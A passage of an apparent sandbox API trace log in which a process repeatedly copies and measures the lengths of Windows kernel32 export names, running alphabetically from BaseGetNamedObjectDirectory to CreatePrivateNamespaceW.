lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.691] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.691] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.691] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.691] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.691] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.691] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.692] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.692] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.692] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.692] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.692] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.692] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.692] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.692] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.692] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.692] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.692] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.692] lstrlenA (lpString="BEEP") returned 4 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.692] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.692] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.692] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.692] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.692] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.692] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.693] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.693] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.693] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.693] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.693] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.693] lstrlenA (lpString="CANCELIO") returned 8 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.693] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.693] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.693] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.693] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.693] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.693] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.693] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.693] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.693] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.693] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.693] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.693] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.694] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.694] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.694] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.694] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.694] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.694] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.694] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.694] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.694] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.694] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.694] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.694] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.694] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.694] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.694] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.694] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.694] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.694] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.694] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.695] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.695] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.695] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.695] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.695] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.695] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.695] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.695] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.695] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.695] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.695] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.695] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.695] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.695] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.695] lstrlenA (lpString="COPYFILEA") returned 9 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.695] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.695] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.695] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.696] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.696] lstrlenA (lpString="COPYFILEW") returned 9 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.696] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.696] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.696] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.696] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.696] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.696] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.696] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.696] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.696] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.696] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.696] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.696] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.696] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.696] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.696] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.696] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.696] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.697] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.697] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.697] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.697] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.697] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.697] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.697] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.697] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.697] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.697] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.697] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.697] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.697] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.697] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.697] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.697] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.697] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.697] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.697] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.698] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.698] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.698] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.698] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.698] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.698] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.698] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.698] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.698] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.698] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.698] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.698] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") 